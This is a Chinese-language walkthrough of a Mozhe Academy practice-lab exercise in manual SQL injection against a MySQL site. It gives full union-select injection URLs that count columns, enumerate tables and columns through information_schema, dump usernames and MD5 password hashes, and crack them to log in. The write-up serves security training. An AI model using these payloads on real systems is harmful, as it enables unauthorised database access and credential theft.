天天看点

墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)

墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)

打开环境

点击箭头指向链接

墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)

观察网页的URL发现有id=1,可能存在SQL注入点。

墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)

首先对URL进行尝试猜列名数量(字段数),在URL后面添加order by 1或者2 直到出现页面不在显示正常页面,这就说明存在的字段数应该是现在所输入的数字减1。

墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)
墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)

此处order by 4页面显示正常而order by 5出现页面不正常显示说明只存在4个字段(注此方法只适用于字段数不是很多的时候)。

然后查看哪个字段能显示出来

在URL后面联合查询 union select 1,2,3,4 在此之前我们还应该把前面id=1给注释掉 将id=1改为id=-1或者使用and 1=2 将id=1 给设置为假,之后发现只有第二字段和第三字段能显示出来

墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)

接下来就开始我们的查询数据库版本和数据库名。分别在第二第三字段输入database(),和 version();查看到数据库名和数据库版本

墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)

得到库名——mozhe_Discuz_StormGroup

得到版本号:5.7.22-0ubuntu0.16.04.1(相对高点的版本存在information_schema数据库)

有了数据库名我们就能查询它内部的表名和列名,其中information_schema储存了数据库中的表名和列名,其中information_schema.tables——记录了所有表名信息的表 ,information_schema.columns——记录了所有列名信息的表,

table_name 表名字段 column_name 列名字段 table_schema 库名字段

查询表名 SQL语句:

http://219.153.49.228:43488/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’

墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)

得到表名——StormGroup_member

查询列名

查询列名得到列名之后就能得到列名中的数据 SQL语句:

http://219.153.49.228:43488/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=‘mozhe_Discuz_StormGroup’

查询到列名有 :id,name,password,status,id,title,content,time

墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)

观察第二第三字段的数据为name,password 在对列名进行具体查询 SQL语句:

http://219.153.49.228:43488/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)

最后得到了两组数据 看到密码估计是被加密了的再看其形式32位由0-9和a-z组成,应该是md5加密。在网上找一个md5在线解码处理一下,得到密码。

最后再登录上平台上面得到:

墨者学院在线靶场中SQL手工注入漏洞测试(MySQL数据库)

得到key

继续阅读